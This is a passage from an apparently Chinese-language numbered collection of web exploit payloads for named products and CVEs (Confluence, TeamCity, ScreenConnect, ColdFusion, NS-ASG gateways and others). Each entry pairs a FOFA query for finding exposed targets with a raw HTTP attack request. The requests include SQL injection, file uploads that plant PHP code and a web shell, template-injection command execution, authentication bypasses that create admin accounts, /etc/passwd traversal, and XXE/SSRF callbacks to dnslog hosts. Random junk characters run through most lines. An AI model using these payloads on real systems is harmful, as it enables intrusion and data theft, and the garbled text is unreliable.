( f4 l1 c+ u0 t0 b. H# e2 p MSec-Fetch-Dest: empty
( f8 R7 @3 V1 xSec-Fetch-Mode: cors; S8 e8 u8 J) x6 R- Q9 k7 l
Sec-Fetch-Site: same-origin
+ M$ m+ P, P3 F4 EX-Forwarded-For: 1.1.1.1
. D6 t+ l& |' `( i5 k4 uX-Originating-Ip: 1.1.1.1# |- i! |8 p' ?8 O# i
X-Remote-Ip: 1.1.1.1& Q2 x/ k# n$ E2 |" C
X-Remote-Addr: 1.1.1.10 u/ m% T2 i0 @5 |
Te: trailers% j' i- u# Z+ ?1 a/ y5 V* r* ?
Connection: close' m" V5 u# o+ T1 Q- l2 t6 a' R% L
8 J3 N b" ?$ J3 ~
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456" H8 |( V" M8 M3 I
4 b ^2 k: n5 E* V
, T4 m8 R3 R: T/ i' Q$ T- `8 ?+ e
120. 北京百绰智能S40管理平台导入web.php任意文件上传
/ j5 n" ~4 ?3 k% |: e7 O zCVE-2024-1253# x7 m! p/ J4 [
FOFA:title="Smart管理平台"
: q; m( D( U! j/ D8 OPOST /useratte/web.php? HTTP/1.1
. w% u- A! C" N5 R5 g. U' v# a V+ XHost: ip:port
+ j' m' A+ n/ d" TCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db+ M- d8 K1 q R1 l$ X' f4 Y3 u; h
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
3 d+ h* }. Y) S d. t# x& I. ]# wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! F7 N0 e- `6 a, O `4 @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( v7 o j- d! j9 ?Accept-Encoding: gzip, deflate- z8 x9 U; C8 C7 @$ W# N
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
* ^9 X4 ^! t% Z& O. O, y( E0 `, |Content-Length: 597
3 E* H4 p% S6 J+ a zOrigin: https://ip:port
}4 `* P+ S# pReferer: https://ip:port/sysmanage/licence.php: P/ G" A1 {$ B- \8 C* M$ h; U1 b: G
Upgrade-Insecure-Requests: 1
5 y9 x' A/ h% T7 NSec-Fetch-Dest: document& k: V1 h j% ~2 w. F/ `
Sec-Fetch-Mode: navigate B3 q% v+ x) O) X* l
Sec-Fetch-Site: same-origin8 H6 m$ _& w: s) C5 B9 E6 Y$ \# o, M' A
Sec-Fetch-User: ?11 a+ U% O+ a! Q! ~% D( q; e
Te: trailers
* b, W+ ]& W! c( uConnection: close: [, j8 }" h; B) B- C! b3 [
- O: g8 q# O& o& @/ c# {
-----------------------------42328904123665875270630079328! J* w+ f' _- c5 c# G. }
Content-Disposition: form-data; name="file_upload"; filename="2.php"
# }5 d* L$ S- n2 I9 n5 PContent-Type: application/octet-stream
4 a" z% \! \+ Z$ f( ~9 k- t
2 J; B: f- F& P; U<?php phpinfo()?>
/ ]6 m- F4 X" l4 s, G9 l$ f-----------------------------423289041236658752706300793285 E4 z4 ?) h8 _! Y& h; u! V2 Z% u
Content-Disposition: form-data; name="id_type" O5 ^4 u' O0 J3 z
* v( ~# {# P) D; u: c& A9 w5 w11 d; h, z5 {3 h C6 m
-----------------------------42328904123665875270630079328
n: |/ Y L B2 a. F' y% J! pContent-Disposition: form-data; name="1_ck"$ H) r$ E& j3 h. h& A
8 \& k. T' g, U& z- k' _6 J9 w' D; D1_radhttp
5 V& C6 J1 [( Y4 |2 u-----------------------------42328904123665875270630079328$ c9 f( {% z2 B
Content-Disposition: form-data; name="mode"2 y& J6 V( Q5 e9 @
# J! n |9 I' ~0 Zimport
) U2 ?/ T, n5 q4 s. E: T- [! E-----------------------------423289041236658752706300793288 `) ^: c4 _: Z8 w: x
( u8 q& }' j9 z4 e! [
2 t. q1 A: a- D+ R
文件路径/upload/2.php
2 _4 t4 W; f2 p I& Z7 Q% S5 y8 P2 m! T
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ a3 ^! \1 a" X7 k" jCVE-2024-1918) m/ B0 o" T0 ^
FOFA:title="Smart管理平台"
+ r2 r, r7 u% K0 C- w! v- aPOST /useratte/userattestation.php HTTP/1.13 y, b' h: g5 g: z& G! S5 P
Host: 192.168.40.130:8443
3 [2 q1 [7 N$ @7 v9 Q3 iCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
1 ?' B; E+ e ?User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko' M% `4 F, }4 Y0 t, H& P7 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) w( K: e. @7 p$ m+ [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 Y4 r& L$ ?7 NAccept-Encoding: gzip, deflate
* E' P5 x! p+ y# i+ c$ AContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793289 ~& w6 M3 _/ t, u) |
Content-Length: 592
' P6 t+ q: ]7 ^: c1 d! iOrigin: https://192.168.40.130:8443/ h' j; H% m7 }$ B* b* f' X. H
Upgrade-Insecure-Requests: 17 B# A5 n" R% ]) @5 G
Sec-Fetch-Dest: document8 P/ Y! V: A: X
Sec-Fetch-Mode: navigate
5 j3 f) { [4 v0 tSec-Fetch-Site: same-origin) P9 y% V6 O+ O' |9 e( k
Sec-Fetch-User: ?1 C. J1 W6 E9 y
Te: trailers
7 b8 h5 a8 e, \* t* o W0 tConnection: close1 ^3 Q& r- i. F7 m$ O' |' z. a
9 i; w1 {% Z1 s& s% i& Z
-----------------------------42328904123665875270630079328
( g q6 {% s& L* @0 f; D( JContent-Disposition: form-data; name="web_img"; filename="1.php"* a; c4 ]% W+ P, s2 @ u5 A* h. R
Content-Type: application/octet-stream& L7 c0 X0 @; F) b
6 t% j C# U+ w# E1 T5 Q
<?php phpinfo();?>
3 D0 {& ]# A7 w& F, w-----------------------------42328904123665875270630079328
8 N; I9 e$ q+ B( R. t: F1 sContent-Disposition: form-data; name="id_type"! m- K' e4 i. V- S2 v
* \9 W! `' y9 u
18 f6 o' h% Y: u
-----------------------------423289041236658752706300793286 g) x$ D4 y7 A7 @7 d( M9 N8 T2 o2 m' ^
Content-Disposition: form-data; name="1_ck"8 l+ ^/ [9 `! i4 L; k
0 x% C' Q9 |- r) I5 @1_radhttp
3 ~' ~% A4 m0 j/ k2 U1 s7 d-----------------------------42328904123665875270630079328
4 H# R/ |6 \! F# {$ tContent-Disposition: form-data; name="hidwel"/ {" f, B3 _5 y6 k0 Z9 Q* F
: v% t0 t: U2 X7 Tset
1 S) M. ]4 a" x4 {6 u2 c-----------------------------42328904123665875270630079328
; R; E, K" D; v7 B& t4 t1 N9 v, H1 L8 p3 `
; a% M! L" a6 X$ Q1 lboot/web/upload/weblogo/1.php
- K3 ?9 R, m9 p& {' x- j' I0 W( ^2 A. T: y
122. 北京百绰智能s200管理平台/importexport.php sql注入$ h" F' ^1 j5 q* n. u
CVE-2024-27718FOFA:title="Smart管理平台"/ h5 l0 g: v w' ^: K- i( a# v( i, B
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()3 x4 h. t6 T2 \
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
5 u* L% R/ B$ E* Q+ j% `& U1 mHost: x.x.x.x
" N0 g# P @2 K" w# SCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc06 E7 G' W& E& P/ n+ j I- `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
( A0 H! Z; r( g* ?, n# ?8 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, O' R) \. z0 A- [/ d# `% xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 j( Y) u4 l6 {4 J# [$ i0 gAccept-Encoding: gzip, deflate, br
# x; \1 K+ |" B k! ~, EUpgrade-Insecure-Requests: 1 n# M, L& {9 |& g* c* X
Sec-Fetch-Dest: document
4 r( k8 e0 R) T$ e! s' {; [0 p8 BSec-Fetch-Mode: navigate6 z# @, i" e2 p. g9 }! U6 a" O
Sec-Fetch-Site: none
) ?; D# g: |- k% K( j; q* |Sec-Fetch-User: ?1 N$ z* J: k3 {) |
Te: trailers8 O& f& ~7 t, n1 P, t- a
Connection: close2 I; x* G5 @$ u$ _6 a, v5 T- D
L% d* K) g) t3 m8 G: w( M& i
0 ?( |% v' L$ C: x {: r123. Atlassian Confluence 模板注入代码执行
* b; \, r% A4 [$ T: E! E5 TFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
" i) S4 K Y& i8 k9 x9 ]POST /template/aui/text-inline.vm HTTP/1.1
& Y# ?3 `( ]3 _& L$ s) cHost: localhost:8090, r' \1 P1 S3 c7 h9 ^- N6 K% G7 K
Accept-Encoding: gzip, deflate, br
; z/ m1 O9 x5 W" o. o/ _Accept: */*+ w d+ ~4 a- N1 m7 J1 g
Accept-Language: en-US;q=0.9,en;q=0.8
3 ]$ W: Y a* E EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 q% d+ s% d; T* h0 m
Connection: close
; d/ t* v& F0 ]* _ Z" TContent-Type: application/x-www-form-urlencoded
' f% M8 J* k( D/ Z3 I6 |4 b) l; Z$ F# @; T3 J
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))4 T3 Z+ X! i6 c3 A% u
6 O' ?( Z( G" p3 ^
/ ]$ v3 ^2 m2 l4 d. g124. 湖南建研工程质量检测系统任意文件上传* ^! z# U, D% I
FOFA:body="/Content/Theme/Standard/webSite/login.css"
9 o9 p( G) M8 E. c* T; ^POST /Scripts/admintool?type=updatefile HTTP/1.1
3 y( o/ K' O9 x& o$ oHost: 192.168.40.130:8282. F4 M3 L2 ~5 q+ D& ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36! g' X6 V6 `% G& }6 O5 |
Content-Length: 72* T$ u) P8 G- X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8% g: P% K* I( i* E
Accept-Encoding: gzip, deflate, br, h* H# g* J; X {! p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 ~: j0 f! [9 S3 S6 `; nConnection: close
/ [$ ~. l' X2 G6 VContent-Type: application/x-www-form-urlencoded
. w- P' [: h) p/ l% B$ R
$ X _0 j7 Z+ h4 e7 JfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>3 A% ^, }" a1 x3 p3 {
7 {" q5 X' |& p
. k: s: o' U2 `/ G; f. Shttp://192.168.40.130:8282/Scripts/abcgcg.aspx# t' z1 i# k- O+ \7 p6 ?! S ~
: D% A2 H- r2 G# M" S125. ConnectWise ScreenConnect身份验证绕过
9 l; B8 z( c a! I& n1 ICVE-2024-1709
6 p: N9 T# e. \" X! E* B( [FOFA:icon_hash="-82958153"; g6 _) V% [$ r
https://github.com/watchtowrlabs ... bypass-add-user-poc
, l: J6 i) m8 I- _, {4 m, c; g5 P5 o
" \4 V* N. Q! P4 T2 [
使用方法
/ P( G8 d; v) r; R0 npython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
8 U. u- O$ r" D; M) {& b- m1 ?' F2 u7 O$ `. d; `
, r. r+ y) I8 p$ v3 `" p3 o& o
创建好用户后直接登录后台,可以执行系统命令。
4 G' z3 l/ q# T, Z* v3 `! x+ R8 e( o1 A
126. Aiohttp 路径遍历/ K3 Z# \. b Q0 }( M/ V
FOFA:title=="ComfyUI", s' ~9 w7 G+ n
GET /static/../../../../../etc/passwd HTTP/1.1
4 n% ^/ F; g) uHost: x.x.x.x0 T! Y4 f. ?9 K8 H# B$ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36, B/ j8 H2 l# G% k5 V
Connection: close5 M6 X# e+ w& E, F$ O4 `& S
Accept: */*
# V: |" b; p% w/ VAccept-Language: en
0 q k$ `7 A/ ~: @7 Z4 N7 Z0 s, pAccept-Encoding: gzip
0 c+ [ _9 G5 I! `
' F+ e6 C( r0 k0 C: D* U- K3 I2 @) n9 J; g/ L# Y; q" R( E9 }- `
127. 广联达Linkworks DataExchange.ashx XXE* a; D$ a* n+ }% {& ]9 Q7 a
FOFA:body="Services/Identification/login.ashx"
9 c/ o/ {, \. J% n2 M/ U6 y) XPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
0 ?+ a5 \6 j. L3 E4 tHost: 192.168.40.130:8888
/ @6 P0 a% D7 \; S+ Z4 H7 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.369 j& w l5 U" i' ?. N n" I5 M& v
Content-Length: 415 M4 l7 G8 R9 c& ?7 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ F4 O9 Q! f8 C7 p$ ?3 LAccept-Encoding: gzip, deflate
4 B4 t3 s9 i/ F4 m" ]$ p0 y1 VAccept-Language: zh-CN,zh;q=0.9
" Y8 [4 R+ q" O# Z% j9 E& w+ gConnection: close
& [& V* q: z# @Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0$ c8 a i2 ]( U" P, l% N+ B0 h0 M
Purpose: prefetch
* n. N* P/ S; [8 QSec-Purpose: prefetch;prerender8 }: q8 j& [+ m1 e
' K. A3 X# r, W: M
------WebKitFormBoundaryJGgV5l5ta05yAIe0
: B; c( U4 W' w! Q" x8 L/ {3 jContent-Disposition: form-data;name="SystemName"
2 U0 x4 q7 F. d" n
( s) c" ]# c" z* K7 @4 m, h: zBIM
- F3 ~9 Y. h3 m2 b------WebKitFormBoundaryJGgV5l5ta05yAIe0# B. W1 _, m3 B I9 n
Content-Disposition: form-data;name="Params"
9 {+ [3 D! C& F7 f3 V5 yContent-Type: text/plain
0 E* d$ Z; b: e7 N) a! C& K7 |( j/ y- i# v
<?xml version="1.0" encoding="UTF-8"?>* h" R# x. }4 H" N4 L& `
<!DOCTYPE test [: U0 ^! D. P0 R1 k
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
# R" D& v1 ~7 u+ f]' U& ]# E* i& g3 B* A
>% T" Z) x# l; M. ]) V
<test>&t;</test>
% z5 A8 X6 ?- ~ {- d------WebKitFormBoundaryJGgV5l5ta05yAIe0--
! c6 x3 t8 O. D2 c
2 L, F; F2 I: n* C/ I& g6 s1 d. R- [' F$ I3 _, V8 l
0 M7 J, N) i6 L2 X8 J# f128. Adobe ColdFusion 反序列化0 V, K. F3 N; ]6 v, f! ]
CVE-2023-38203
7 h. O5 r! x+ E' S- GAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)& ^5 D7 C- a2 k0 W
FOFA:app="Adobe-ColdFusion": |9 W1 D0 Z) S3 }4 c. M: Y
PAYLOAD; O( \# Z4 W0 z% x' o
% a8 Q9 J) t5 k0 M, s) }
129. Adobe ColdFusion 任意文件读取5 @) b0 u8 _; ]. I- ~; h U
CVE-2024-20767
7 N. x7 F1 b* e a! Y' L. YFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"" M3 i, f6 L+ d
第一步,获取uuid* l2 |) C! z- a: I* U& h* f
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
5 T" x6 I% X# ?& ]9 ?1 MHost: x.x.x.x, j( M8 z0 l5 {, A; j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# O6 Y* A/ V( u. _! w& o
Accept: */*
2 X7 J4 _2 ]0 l; c- z0 ]+ g# z, {- pAccept-Encoding: gzip, deflate
. A- O+ \3 x5 |) v; XConnection: close0 j' [" y: [ S# U. B' o
1 K% C9 Z: G/ t/ t
, {2 r2 q5 C [ p第二步,读取/etc/passwd文件* D6 p: Q; N* m% q. j+ x
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1" F* [# V% t3 e. a/ `
Host: x.x.x.x; W/ H" W# @5 M7 \6 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
8 s, [7 w; M V1 MAccept: */*
2 M: J' T6 @3 cAccept-Encoding: gzip, deflate
/ D ?5 ^+ A5 i6 F) SConnection: close
) ~% f" W1 Q# [0 Xuuid: 85f60018-a654-4410-a783-f81cbd5000b9
; p1 |+ c& ?$ ^0 z
6 T1 R N0 e$ g x& R0 M m" Q" s. M2 {; a& z3 M2 N
130. Laykefu客服系统任意文件上传
" U$ W+ c# F3 T# o- J* uFOFA:icon_hash="-334624619"
& W4 e0 q( m, U1 TPOST /admin/users/upavatar.html HTTP/1.1
( }6 {& Q2 u" N; Q4 ^Host: 127.0.0.1
s+ A8 a6 U/ R+ D6 [Accept: application/json, text/javascript, */*; q=0.01; r6 m7 V* o8 A5 G. [! Q& D) e
X-Requested-With: XMLHttpRequest
0 }! v( M5 N9 V: e. I/ FUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26- [. T; c; W% ^! i& H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
9 l1 M% x2 b0 u* p; Q3 QAccept-Encoding: gzip, deflate& t9 G5 f& X6 V
Accept-Language: zh-CN,zh;q=0.9
8 b A+ g6 S- i0 MCookie: user_name=1; user_id=3! F6 E, `, M( |5 Y0 n
Connection: close
- o) n$ ]- g# f" ^
/ b9 s# p: ?; f+ k% l1 w: ^------WebKitFormBoundary3OCVBiwBVsNuB2kR1 x0 F, }. T9 {, e
Content-Disposition: form-data; name="file"; filename="1.php"' J5 A- `; }6 N2 g! Y
Content-Type: image/png
; l. h; Y* j4 W/ V8 r- w5 } 2 N: D, R5 t( w4 c( y& m, V- y
<?php phpinfo();@eval($_POST['sec']);?>
5 K6 ?$ H1 v8 Q2 x- H------WebKitFormBoundary3OCVBiwBVsNuB2kR--
7 N6 @& ~. z% d! W; @8 t
, o2 J/ z% m0 b) n( y: g, W; _, ^2 `6 H
131. Mini-Tmall <=20231017 SQL注入
: N2 ~; `: d2 @) OFOFA:icon_hash="-2087517259"
& ]: I) k6 p: [4 U' q2 a$ k! S) ~后台地址:http://localhost:8080/tmall/admin3 ?! y" G4 H, L) ^
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
9 x* @# m9 L" L1 J+ P$ q7 w2 D' h- a0 o* ^* U2 J3 }
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过+ [* g1 c8 R/ y. r3 e
CVE-2024-27198, e# V9 N1 P, o+ ?1 T1 Z1 j+ }
FOFA:body="Log in to TeamCity"
" q7 {% X# D7 n: [9 KPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.12 {6 a. {: n; C; Y
Host: 192.168.40.130:8111& m3 ~0 H, c* N8 i3 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 l7 j$ e! K7 G0 H1 [2 @$ Y9 u
Accept: */*+ q! i. R3 A+ F' L; q
Content-Type: application/json
8 M8 D' p" j- ^8 p; X V" YAccept-Encoding: gzip, deflate
: d# `8 O1 h* z$ {1 d* C! b+ M9 q {& l# _: {& X# n7 S0 E3 M: @
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}% a n7 f& w9 O$ g6 o/ m
9 G# Q, y( N$ S( }: u4 a X+ V( ^; d! Y1 v' l/ G
CVE-2024-27199. M8 K2 w y2 {
/res/../admin/diagnostic.jsp
1 ]' R2 _- {% e$ m" O/.well-known/acme-challenge/../../admin/diagnostic.jsp+ m1 e0 q) A% L; c
/update/../admin/diagnostic.jsp
2 Y% v" E8 t/ n! R9 Q% H. c8 ~9 }- N* }' n
# B* G3 p) S/ |. V6 f# C2 e1 ^8 gCVE-2024-27198-RCE.py; J. N R% E0 Z8 Y
' u& m! f5 U' p1 ^, K
133. H5 云商城 file.php 文件上传 D% k% X% n* d9 j
FOFA:body="/public/qbsp.php"
; g4 P7 Z) I0 j- w7 x& d- z0 VPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
, j. o5 E( J4 SHost: your-ip- r; A5 J7 y6 u. L `1 @8 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 [, b" |5 v* R: S% u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
8 N0 o4 n; U; \6 C7 f7 U% S( n* D" B7 l5 s7 q9 f; Q5 S; B4 U$ y9 J
------WebKitFormBoundaryFQqYtrIWb8iBxUCx" E* t+ R. |$ r6 `) w# p
Content-Disposition: form-data; name="file"; filename="rce.php" l6 M) X8 |% J% m( a& H: {
Content-Type: application/octet-stream4 g, A1 p3 w( z3 F9 @9 _
3 w7 A u8 j$ l<?php system("cat /etc/passwd");unlink(__FILE__);?>
0 g+ A; _; ]* J1 Z2 b( U------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
$ C' M/ C7 q$ p
* W7 M* [4 A1 a- p9 c Z
' x& @5 ?4 r* d/ u' ~7 c' V b! N6 P' n0 C$ S
134. 网康NS-ASG应用安全网关index.php sql注入( l- X( x f I. P
CVE-2024-2330
8 F+ Z; t3 h5 D- f8 n, L( iNetentsec NS-ASG Application Security Gateway 6.3版本
# q8 t b9 |; k* q# r, @2 A. R8 eFOFA:app="网康科技-NS-ASG安全网关"/ Z& ]4 _ e7 C. [7 E
POST /protocol/index.php HTTP/1.1
/ ~5 Y2 @. r; k& ?$ y; MHost: x.x.x.x
. f# l6 v& S9 A' }, H, rCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de6 M: F3 c c3 ?! e7 C$ ^. L1 d1 y9 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
( z0 ]$ p4 G8 NAccept: */*2 |3 \2 w+ y$ n+ M! K. ~6 g* Z# R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 v& X6 [3 g+ tAccept-Encoding: gzip, deflate
( V, D; k% Y; [' G$ w2 CSec-Fetch-Dest: empty
7 ~" o. X: s) }' Q$ HSec-Fetch-Mode: cors
; P' c8 r+ b' q$ l: U4 _Sec-Fetch-Site: same-origin0 x: F; \7 `# V \0 |0 P3 G8 {1 }/ `3 |
Te: trailers
& m2 s/ Z, [; I3 D5 Z: R8 k9 NConnection: close9 l% C1 ]" F* _. f6 z& E
Content-Type: application/x-www-form-urlencoded1 D- ~5 }% b- ~/ q$ _! h
Content-Length: 263; ^7 \2 w1 ]% o4 ~* x7 [
3 Z" e% Q( {8 E2 Wjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}& I6 E: T3 o1 w9 S4 c
& K. c, |8 b3 B5 |; w' \. p/ a/ h! e3 \9 y1 k
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
5 r/ F! O' U1 V. A! fCVE-2024-2022/ A1 o4 A8 c* q
Netentsec NS-ASG Application Security Gateway 6.3版本8 n' K7 ~8 a/ i7 r m( Y
FOFA:app="网康科技-NS-ASG安全网关"
b: @# S, b2 J* \GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1' m5 y+ Q& R! |' ?
Host: x.x.x.x
: v9 _4 f/ T% c; y( PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. [9 x! a$ ]: W% U8 |0 a d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 H$ p m' x, T+ `9 j: g
Accept-Encoding: gzip, deflate
* h4 H+ V/ ^6 g& `. m/ @ A1 ^Accept-Language: zh-CN,zh;q=0.9; [" `6 o W# B- ]3 C7 j( d x% _
Connection: close/ p/ H* i2 M/ H7 i. W4 w
" ?9 ~0 Q7 R2 Y
) K8 f6 ~" m) O7 S1 G- a7 A+ {2 x
136. NextChat cors SSRF
@3 F d Y' i* \& i7 Q0 aCVE-2023-49785
5 D# z: a) m0 B) x! OFOFA:title="NextChat"
8 y' t$ q) a) S2 h) T5 RGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1. E7 E/ C9 }. |
Host: x.x.x.x:10000( Z( l3 y2 g7 }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ }$ o/ S- Y/ ]) ZConnection: close
3 i8 s4 f2 ]: {2 s( G, eAccept: */*
Q7 G3 d$ c% W% d/ z: i* ZAccept-Language: en5 Z2 K) \7 @) n
Accept-Encoding: gzip
! a4 O# R% v# O/ T7 G y5 }) L2 C# X# g
' w0 i& W. t7 T, I4 a# E+ w137. 福建科立迅通信指挥调度平台down_file.php sql注入
7 @8 k/ ^2 f" C' f& H BCVE-2024-2620
7 \- B" q9 v$ k% o/ DFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"! V5 o- w4 X0 W
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.15 A* ~6 D3 u6 s1 t5 X( D+ j5 `
Host: x.x.x.x
5 I/ s+ D2 ^3 ~8 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0& Z3 I+ E. `: J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ j9 u7 `8 _8 b. q9 U( T$ w: JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ]: W4 u. V5 @: LAccept-Encoding: gzip, deflate, br8 o4 O4 B p! U. y- Q9 S
Connection: close
: q' ~: Q3 P& u) B- g9 A7 ?+ @Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj. {, |; k+ {0 W! D% N; H4 G
Upgrade-Insecure-Requests: 1) F/ V V: x; c1 Y* g! V
# o: `! P1 q0 E- Y1 B" l
# Q: |5 [3 ?( d% t% ?
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
" I) D7 h) l( |# u+ a# n5 }CVE-2024-2621& h9 J* U2 Q# z1 ^
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
# W2 m7 i) }$ e8 F y$ LGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
& Z+ t5 y! v4 r7 AHost: x.x.x.x
- c) e2 n$ [5 D& mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! D4 s$ D5 _, e s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 x" Y- [: ]" s: MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) |, E* M& I3 r
Accept-Encoding: gzip, deflate, br
" S4 V6 [5 p3 w- m! Q/ O1 LConnection: close
! h1 c" n7 {/ G, J# B& pUpgrade-Insecure-Requests: 1- z2 G/ l! @7 U0 y( @+ c
4 Y& k- Y& m" _6 Z r9 I' w
|5 Z1 O* P9 g7 k; a139. 福建科立讯通信指挥调度平台editemedia.php sql注入6 \! b/ J( T' k. W6 M
